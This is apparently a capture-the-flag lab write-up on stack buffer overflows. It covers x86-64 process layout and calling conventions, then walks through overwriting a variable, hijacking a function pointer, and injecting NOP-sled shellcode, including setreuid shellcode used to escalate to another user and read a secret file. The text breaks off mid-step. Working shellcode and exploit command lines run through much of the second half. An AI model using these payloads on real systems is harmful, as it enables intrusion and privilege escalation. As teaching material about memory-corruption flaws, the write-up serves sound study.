Skip to content

Documentation

Process Layout

When a program runs on a machine, the computer runs the program as a process. Current computer architecture allows multiple processes to be run concurrently(at the same time by a computer). While these processes may appear to run at the same time, the computer actually switches between the processes very quickly and makes it look like they are running at the same time. Switching between processes is called a context switch. Since each process may need different information to run(e.g. The current instruction to execute), the operating system has to keep track of all the information in a process. The memory in the process is organised sequentially and has the following layout:  d549e31471dc8d883c7ada44effa80d5.png

  • User stack contains the information required to run the program. This information would include the current program counter, saved registers and more information. The section after the user stack is unused memory and it is used in case the stack grows(downwards).
  • Shared library regions are used to either statically/dynamically link libraries that are used by the program.
  • The heap increases and decreases dynamically depending on whether a program dynamically assigns memory. Notice there is a section that is unassigned above the heap which is used in the event that the size of the heap increases.
  • The program code and data stores the program executable and initialised variables.

x86-64 Procedures

bcde6bc32857184aa452aeefaba55ec7.png

A program would usually comprise of multiple functions and there needs to be a way of tracking which function has been called, and which data is passed from one function to another. The stack is a region of contiguous memory addresses and it is used to make it easy to transfer control and data between functions. The top of the stack is at the lowest memory address and the stack grows towards lower memory addresses. The most common operations of the stack are:

Pushing: used to add data onto the stack Popping: used to remove data from the stack

push var

This is the assembly instruction to push a value onto the stack. It does the following: - Uses var or value stored in memory location of var

7bd1db3f521b49bf579afecff0d8fe26.png

  • Decrements the stack pointer(known as rsp) by 8
  • Writes above value to new location of rsp, which is now the top of the stack

ba228a2a0821bf3f86f0cf7c9addeb30.png

pop var

This is an assembly instruction to read a value and pop it off the stack. It does the following: - Reads the value at the address given by the stack pointer c74fcaa274a72936dda8943a664e3079.png

Stack Top(memory location 0x0)(rsp points here) - Increment the stack pointer by 8 - Store the value that was read from rsp into var

6556ec27c0d42b25fa15d2b142369efc.png

Each compiled program may include multiple functions, where each function would need to store local variables, arguments passed to the function and more. To make this easy to manage, each function has its own separate stack frame, where each new stack frame is allocated when a function is called, and deallocated when the function is complete. 

2e997f961ba32e1aa6462df3cb897088.png

This is easily explained using an example. Look at the two functions:

int add(int a, int b){

   int new = a + b;

   return new;

}

int calc(int a, int b){

   int final = add(a, b);

   return final;

}

calc(4, 5)

Procedures Continued

The explanation assumes that the current point of execution is inside the calc function. In this case calc is known as the caller function and add is known as the callee function. The following presents the assembly code inside the calc function. c9d564c71559e7d810ad7755f2509ca5.png

31b336be3ab6a0d2453ceed377570edc.png

The add function is invoked using the call operand in assembly, in this case callq sym.add. The call operand can either take a label as an argument(e.g. A function name), or it can take a memory address as an offset to the location of the start of the function in the form of call *value. Once the add function is invoked(and after it is completed), the program would need to know what point to continue in the program. To do this, the computer pushes the address of the next instruction onto the stack, in this case the address of the instruction on the line that contains movl %eax, local_4h. After this, the program would allocate a stack frame for the new function, change the current instruction pointer to the first instruction in the function, change the stack pointer(rsp) to the top of the stack, and change the frame pointer(rbp) to point to the start of the new frame. 

2f92a6159013801a78c908e8f1bb0fe7.png 6a4adf7f654b54874628e7a808363951.png

Once the function is finished executing, it will call the return instruction(retq). This instruction will pop the value of the return address of the stack, deallocate the stack frame for the add function, change the instruction pointer to the value of the return address, change the stack pointer(rsp) to the top of the stack and change the frame pointer(rbp) to the stack frame of calc.

378d0c8eb1daea58157493b0e94d9bc7.png d32f510fa06cb49a029448e66b95cec5.png

Now that we’ve understood how control is transferred through functions, let’s look at how data is transferred. 

In the above example, we save that functions take arguments. The calc function takes 2 arguments(a and b). Upto 6 arguments for functions can be stored in the following registers: - rdi - rsi - rdx - rcx - r8 - r9

Note: rax is a special register that stores the return values of the functions(if any).

If a function has anymore arguments, these arguments would be stored on the functions stack frame. 

We can now see that a caller function may save values in their registers, but what happens if a callee function also wants to save values in the registers? To ensure the values are not overwritten, the callee values first save the values of the registers on their stack frame, use the registers and then load the values back into the registers. The caller function can also save values on the caller function frame to prevent the values from being overwritten. Here are some rules around which registers are caller and callee saved:

  • rax is caller saved
  • rdi, rsi, rdx, rcx r8 and r9 are called saved(and they are usually arguments for functions)
  • r10, r11 are caller saved
  • rbx, r12, r13, r14 are callee saved 
  • rbp is also callee saved(and can be optionally used as a frame pointer)
  • rsp is callee saved

So far, this is a more thorough example of the run time stack: c49c51848bf44b7d0513ca7ca5a3f808.png

Endianess

In the above programs, you can see that the binary information is represented in hexadecimal format. Different architectures actually represent the same hexadecimal number in different ways, and this is what is referred to as Endianess. Let’s take the value of 0x12345678 as an example. Here the least significant value is the right most value(78) while the most significant value is the left most value(12).

Little Endian is where the value is arranged from the least significant byte to the most significant byte: 1097370894e8497b4694c49603942f47.png

Big Endian is where the value is arranged from the most significant byte to the least significant byte. 053598c5d60bc27c067fd8751de70337.png

Here, each “value” requires at least a byte to represent, as part of a multi-byte object.

Overwriting Variables

Now that we’ve looked at all the background information, let’s explore how the overflows actually work. If you take a look at the overflow-1 folder, you’ll notice some C code with a binary program. Your goal is to change the value of the integer variable. 

c5a97d78d58276f7dbac32cbe19dc2ef.png

From the C code you can see that the integer variable and character buffer have been allocated next to each other - since memory is allocated in contiguous bytes, you can assume that the integer variable and character buffer are allocated next to each other. 

Note: this may not always be the case. With how the compiler and stack are configured, when variables are allocated, they would need to be aligned to particular size boundaries(e.g. 8 bytes, 16 byte) to make it easier for memory allocation/deallocation. So if a 12 byte array is allocated where the stack is aligned for 16 bytes this is what the memory would look like: 23275b41822e85a630b2be90a751ba20.png

The compiler would automatically add 4 bytes to ensure that the size of the variable aligns with the stack size. From the image of the stack above, we can assume that the stack frame for the main function looks like this: 42e45ba97e36598764d2056ff6d14674.png

Even though the stack grows downwards, when data is copied/written into the buffer, it is copied from lower to higher addresess. Depending on how data is entered into the buffer, it means that it's possible to overwrite the integer variable. From the C code, you can see that the gets function is used to enter data into the buffer from standard input. The gets function is dangerous because it doesn't really have a length check - This would mean that you can enter more than 14 bytes of data, which would then overwrite the integer variable. 

Try run the C program in this folder to overwrite the above variable!

Because the buffer has a size of 14. We can exploit the vulnerability with: python -c "print('a' * 14 + 'toto')" | ./program

Overwriting Function Pointers

For this example, look at the overflow- 2 folder. Inside this folder, you’ll notice the following C code.

be675ed8c0131c177ff164465d33fc7c.png

To begin, we run the program through gdb, we can see that with 15 * A the return address is overwritten with one 41 wich corresponds to one A:

[user1@ip-10-10-50-167 overflow-2]$ gdb func-pointer
GNU gdb (GDB) Red Hat Enterprise Linux 8.0.1-30.amzn2.0.3
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-redhat-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from func-pointer...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/user1/overflow-2/func-pointer 
Missing separate debuginfos, use: debuginfo-install glibc-2.26-32.amzn2.0.1.x86_64
AAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x0000000000400041 in ?? ()

Then, by entering 20*A we can see that the return address is filled with several 41. We can't add more A because by adding one more, we are overwriting too far.

(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-2/func-pointer 
AAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-2/func-pointer 
AAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x00000000004005da in main ()
(gdb) print special
$1 = {<text variable, no debug info>} 0x400567 <special>

Finally we add the address of the special function after the 14 a.

[user1@ip-10-10-50-167 overflow-2]$ python -c "print('a' * 14 + '\x67\x05\x40')" | ./func-pointer 
this is the special function
you did this, friend!

Buffer Overflows

For this example, look at overflow-3 folder. Inside this folder, you’ll find the following C code. 98afab43a02fbbe0504d3c1ec3c09e4a.png

This example will cover some of the more interesting, and useful things you can do with a buffer overflow. In the previous examples, we’ve seen that when a program takes users controlled input, it may not check the length, and thus a malicious user could overwrite values and actually change variables.

In this example, in the copy_arg function we can see that the strcpy function is copying input from a string(which is argv[1] which is a command line argument) to a buffer of length 140 bytes. With the nature of strcpy, it does not check the length of the data being input so here it’s also possible to overflow the buffer - we can do something more malicious here. 

Let’s take a look at what the stack will look like for the copy_arg function(this stack excludes the stack frame for the strcpy function): bee5889ee0755ceafd9d0fb7977f4848.png

Earlier, we saw that when a function(in this case main) calls another function(in this case copy_args), it needs to add the return address on the stack so the callee function(copy_args) knows where to transfer control to once it has finished executing. From the stack above, we know that data will be copied upwards from buffer[0] to buffer[140]. Since we can overflow the buffer, it also follows that we can overflow the return address with our own value. We can control where the function returns and change the flow of execution of a program(very cool, right?)

Know that we know we can control the flow of execution by directing the return address to some memory address, how do we actually do something useful with this. This is where shellcode comes in; shell code quite literally is code that will open up a shell. More specifically, it is binary instructions that can be executed. Since shellcode is just machine code(in the form of binary instructions), you can usually start of by writing a C program to do what you want, compile it into assembly and extract the hex characters(alternatively it would involve writing your own assembly). For now we’ll use this shellcode that opens up a basic shell:

\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05

So why don’t we looking at actually executing this shellcode. The basic idea is that we need to point the overwritten return address to the shellcode, but where do we actually store the shellcode and what actual address do we point it at? Why don’t we store the shellcode in the buffer - because we know the address at the beginning of the buffer, we can just overwrite the return address to point to the start of the buffer. Here’s the general process so far:

  • Find out the address of the start of the buffer and the start address of the return address
  • Calculate the difference between these addresses so you know how much data to enter to overflow
  • Start out by entering the shellcode in the buffer, entering random data between the shellcode and the return address, and the address of the buffer in the return address

0538671c45790cc7fc1dd7066f5864bf.png

In theory, this looks like it would work quite well. However, memory addresses may not be the same on different systems, even across the same computer when the program is recompiled. So we can make this more flexible using a NOP instruction. A NOP instruction is a no operation instruction - when the system processes this instruction, it does nothing, and carries on execution. A NOP instruction is represented using \x90. Putting NOPs as part of the payload means an attacker can jump anywhere in the memory region that includes a NOP and eventually reach the intended instructions. This is what an injection vector would look like: bc71baa44e243589c7d357e7983faff4.png

You’ve probably noticed that shellcode, memory addresses and NOP sleds are usually in hex code. To make it easy to pass the payload to an input program, you can use python:

python -c "print('\x90' * 30 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + '\x41' * 60 + '\x60\x20\xa2\xf7\xff\x7f') | ./program_name"

Firstly, we have to found the number of characters to pass in order to overflow the return address:

[user1@ip-10-10-144-140 overflow-3]$ gdb --args buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
GNU gdb (GDB) Red Hat Enterprise Linux 8.0.1-30.amzn2.0.3
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-redhat-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from buffer-overflow...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/user1/overflow-3/buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Missing separate debuginfos, use: debuginfo-install glibc-2.26-32.amzn2.0.1.x86_64
Here's a program that echo's out your input
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x0000000000400041 in ?? ()

We can see that with 153 * A we can overflow the return address.

Now, we determine the maximum size of the payload:

[user1@ip-10-10-144-140 overflow-3]$ gdb --args buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
GNU gdb (GDB) Red Hat Enterprise Linux 8.0.1-30.amzn2.0.3
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-redhat-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from buffer-overflow...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/user1/overflow-3/buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Missing separate debuginfos, use: debuginfo-install glibc-2.26-32.amzn2.0.1.x86_64
Here's a program that echo's out your input
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x0000000000400563 in copy_arg ()

With 159 * A we are gone too far. So the maximum size is 158.

So let's craft a payload:

[user1@ip-10-10-144-140 overflow-3]$ python
Python 2.7.16 (default, Jul 19 2019, 23:05:17) 
[GCC 7.3.1 20180712 (Red Hat 7.3.1-6)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> shellcode = '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05'
>>> len(shellcode)
30
>>> payload = '\x90' * 90 + shellcode + 'A' * 32 + 'B' * 6
>>> len(payload)
158

The memory address has a size of 6 character so we used 6 * B in order to recognize them on the return address:

(gdb) run $(python -c "print('\x90' * 90 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + 'A' * 32 + 'B' * 6)")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-3/buffer-overflow $(python -c "print('\x90' * 90 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + 'A' * 32 + 'B' * 6)")
Here's a program that echo's out your input
������������������������������������������������������������������������������������������H�/bin/shH�H�QH�<$H1Ұ;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBB

Program received signal SIGSEGV, Segmentation fault.
0x0000424242424242 in ?? ()

That's a success ! So now, we need to find the address of the shellcode. To do so we will print the memory where the shellcode is located. We defined the units of memory to print to 100 and we point to rsp - 158 because rsp contains the stack pointer and we know that the payload has a size of 158. The memory printed should begin with NOPs:

(gdb) x/100x $rsp-158
0x7fffffffe252: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe262: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe272: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe282: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe292: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe2a2: 0x90909090      0x90909090      0x622fb948      0x732f6e69
0x7fffffffe2b2: 0xc1481168      0xc14808e1      0x485108e9      0x48243c8d
0x7fffffffe2c2: 0x3bb0d231      0x4141050f      0x41414141      0x41414141
0x7fffffffe2d2: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe2e2: 0x41414141      0x42424141      0x42424242      0xe3e80000
0x7fffffffe2f2: 0x7fffffff      0x00000000      0x00020000      0x05a00000
0x7fffffffe302: 0x00000040      0x302a0000      0x7ffff7a4      0x00000000
0x7fffffffe312: 0x00000000      0xe3e80000      0x7fffffff      0x00000000
0x7fffffffe322: 0x00020004      0x05640000      0x00000040      0x00000000
0x7fffffffe332: 0x00000000      0x41590000      0x81598c13      0x045071f6
0x7fffffffe342: 0x00000040      0xe3e00000      0x7fffffff      0x00000000
0x7fffffffe352: 0x00000000      0x00000000      0x00000000      0x41590000
0x7fffffffe362: 0x7e264173      0x41598e09      0x6e91d897      0x00008e09
0x7fffffffe372: 0x00000000      0x00000000      0x00000000      0x00000000
0x7fffffffe382: 0x00000000      0xe4000000      0x7fffffff      0xe1300000
0x7fffffffe392: 0x7ffff7ff      0x76560000      0x7ffff7de      0x00000000
0x7fffffffe3a2: 0x00000000      0x00000000      0x00000000      0x00000000
0x7fffffffe3b2: 0x00000000      0x04500000      0x00000040      0xe3e00000
0x7fffffffe3c2: 0x7fffffff      0x047a0000      0x00000040      0xe3d80000
0x7fffffffe3d2: 0x7fffffff      0xdf800000      0x7ffff7ff      0x00020000

As you can see, the shellcode begins between 0x7fffffffe292 and 0x7fffffffe292. So to be sure of the address, we realign the pointer.

(gdb) x/100x $rsp-160
0x7fffffffe248: 0xffffe648      0x00007fff      0x90909090      0x90909090
0x7fffffffe258: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe268: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe278: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe288: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe298: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe2a8: 0xb9489090      0x6e69622f      0x1168732f      0x08e1c148
0x7fffffffe2b8: 0x08e9c148      0x3c8d4851      0xd2314824      0x050f3bb0
0x7fffffffe2c8: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe2d8: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe2e8: 0xffffe2a8      0x007fff66      0xffffe3e8      0x00007fff
0x7fffffffe2f8: 0x00000000      0x00000002      0x004005a0      0x00000000
0x7fffffffe308: 0xf7a4302a      0x00007fff      0x00000000      0x00000000
0x7fffffffe318: 0xffffe3e8      0x00007fff      0x00040000      0x00000002
0x7fffffffe328: 0x00400564      0x00000000      0x00000000      0x00000000
0x7fffffffe338: 0xf7bfdd97      0x25c4f6f9      0x00400450      0x00000000
0x7fffffffe348: 0xffffe3e0      0x00007fff      0x00000000      0x00000000
0x7fffffffe358: 0x00000000      0x00000000      0x3adfdd97      0xda3b0986
0x7fffffffe368: 0xa33bdd97      0xda3b1931      0x00000000      0x00000000
0x7fffffffe378: 0x00000000      0x00000000      0x00000000      0x00000000
0x7fffffffe388: 0xffffe400      0x00007fff      0xf7ffe130      0x00007fff
0x7fffffffe398: 0xf7de7656      0x00007fff      0x00000000      0x00000000
0x7fffffffe3a8: 0x00000000      0x00000000      0x00000000      0x00000000
0x7fffffffe3b8: 0x00400450      0x00000000      0xffffe3e0      0x00007fff
0x7fffffffe3c8: 0x0040047a      0x00000000      0xffffe3d8      0x00007fff

We can add the 0x7fffffffe298 at the end of our payload:

(gdb) run $(python -c "print('\x90' * 90 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + 'A' * 32 + '\x98\xe2\xff\xff\xff\x7f')")
Starting program: /home/user1/overflow-3/buffer-overflow $(python -c "print('\x90' * 90 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + 'A' * 32 + '\x98\xe2\xff\xff\xff\x7f')")
Missing separate debuginfos, use: debuginfo-install glibc-2.26-32.amzn2.0.1.x86_64
Here's a program that echo's out your input
������������������������������������������������������������������������������������������H�/bin/shH�H�QH�<$H1Ұ;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����

Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe2c8 in ?? ()

After many failed attempts, I've found a shellcode here.

So let's update the payload, and this works:

(gdb) run $(python -c "print('\x90' * 90 + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 22 + '\x98\xe2\xff\xff\xff\x7f')")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-3/buffer-overflow $(python -c "print('\x90' * 90 + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 22 + '\x98\xe2\xff\xff\xff\x7f')")
Here's a program that echo's out your input
������������������������������������������������������������������������������������������j;XH1�I�//bin/shI�APH��RWH��j<XH1�AAAAAAAAAAAAAAAAAAAAAA�����
process 5242 is executing new program: /usr/bin/bash
sh-4.2$ id
Detaching after fork from child process 5246.
uid=1001(user1) gid=1001(user1) groups=1001(user1)
sh-4.2$ ls -la
Detaching after fork from child process 5247.
total 20
drwxrwxr-x 2 user1 user1   72 Sep  2  2019 .
drwx------ 7 user1 user1  169 Nov 27  2019 ..
-rwsrwxr-x 1 user2 user2 8264 Sep  2  2019 buffer-overflow
-rw-rw-r-- 1 user1 user1  285 Sep  2  2019 buffer-overflow.c
-rw------- 1 user2 user2   22 Sep  2  2019 secret.txt
sh-4.2$ cat secret.txt 
Detaching after fork from child process 5248.
cat: secret.txt: Permission denied

But we have a permission denied...

So let's use pwntools in order to craft a shell code who sets reuid to 1002 (the id of user2):

root@bastion:~# pwn shellcraft -f d amd64.linux.setreuid 1002
\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05
>>> payload = '\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05'
>>> len(payload)
14

We add the shellcode and update the number of random chars in consequences:

[user1@ip-10-10-144-140 overflow-3]$ ./buffer-overflow $(python -c "print('\x90' * 90 + '\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 8 + '\x98\xe2\xff\xff\xff\x7f')")
Here's a program that echo's out your input
������������������������������������������������������������������������������������������1�f��jqXH��j;XH1�I�//bin/shI�APH��RWH��j<XH1�AAAAAAAA�����
sh-4.2$ id
uid=1002(user2) gid=1001(user1) groups=1001(user1)
sh-4.2$ cat secret.txt  
omgyoudidthissocool!!

Buffer Overflows 2

Try to use your newly learnt buffer overflow techniques for this binary file:

#include <stdio.h>
#include <stdlib.h>

void concat_arg(char *string)
{
    char buffer[154] = "doggo";
    strcat(buffer, string);
    printf("new word is %s\n", buffer);
    return 0;
}

int main(int argc, char **argv)
{
    concat_arg(argv[1]);
}

Firstly, we found that the return address started to be overwritten from the 164th character until the 169th.

(gdb) run $(python -c "print('A' * 164)")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-4/buffer-overflow-2 $(python -c "print('A' * 164)")
new word is doggoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x0000000000400041 in ?? ()
(gdb) run $(python -c "print('A' * 169)")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-4/buffer-overflow-2 $(python -c "print('A' * 169)")
new word is doggoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()

So let's craft a payload like previously and adapt it to this binary:

(gdb) run $(python -c "print('\x90' * 90 + '\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 19 + 'B' * 6)")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-4/buffer-overflow-2 $(python -c "print('\x90' * 90 + '\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 19 + 'B' * 6)")
new word is doggo������������������������������������������������������������������������������������������1�f��jqXH��j;XH1�I�//bin/shI�APH��RWH��j<XH1�AAAAAAAAAAAAAAAAAAABBBBBB

Program received signal SIGSEGV, Segmentation fault.
0x0000424242424242 in ?? ()

The retrun address is overwritten so we just need to replace the B * 6 with the memory address where the shellcode starts:

(gdb) x/100x $rsp-164
0x7fffffffe23c: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe24c: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe25c: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe26c: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe27c: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe28c: 0x31909090      0xeabf66ff      0x58716a03      0x0ffe8948
0x7fffffffe29c: 0x583b6a05      0x49d23148      0x622f2fb8      0x732f6e69
0x7fffffffe2ac: 0xe8c14968      0x48504108      0x5752e789      0x0fe68948
0x7fffffffe2bc: 0x583c6a05      0x0fff3148      0x41414105      0x41414141
0x7fffffffe2cc: 0x41414141      0x41414141      0x41414141      0x42424242
0x7fffffffe2dc: 0x00004242      0xffffe3d8      0x00007fff      0x00000000
0x7fffffffe2ec: 0x00000002      0x004005e0      0x00000000      0xf7a4302a
0x7fffffffe2fc: 0x00007fff      0x00000000      0x00000000      0xffffe3d8
0x7fffffffe30c: 0x00007fff      0x00040000      0x00000002      0x004005ac
0x7fffffffe31c: 0x00000000      0x00000000      0x00000000      0xa5ce3cc0
0x7fffffffe32c: 0xe848714a      0x00400450      0x00000000      0xffffe3d0
0x7fffffffe33c: 0x00007fff      0x00000000      0x00000000      0x00000000
0x7fffffffe34c: 0x00000000      0x680e3cc0      0x17b78e35      0xf1ca3cc0
0x7fffffffe35c: 0x17b79e82      0x00000000      0x00000000      0x00000000
0x7fffffffe36c: 0x00000000      0x00000000      0x00000000      0xffffe3f0
0x7fffffffe37c: 0x00007fff      0xf7ffe130      0x00007fff      0xf7de7656
0x7fffffffe38c: 0x00007fff      0x00000000      0x00000000      0x00000000
0x7fffffffe39c: 0x00000000      0x00000000      0x00000000      0x00400450
0x7fffffffe3ac: 0x00000000      0xffffe3d0      0x00007fff      0x0040047a
0x7fffffffe3bc: 0x00000000      0xffffe3c8      0x00007fff      0xf7ffdf80

We can add the 0x7fffffffe28c address at the end of our payload:

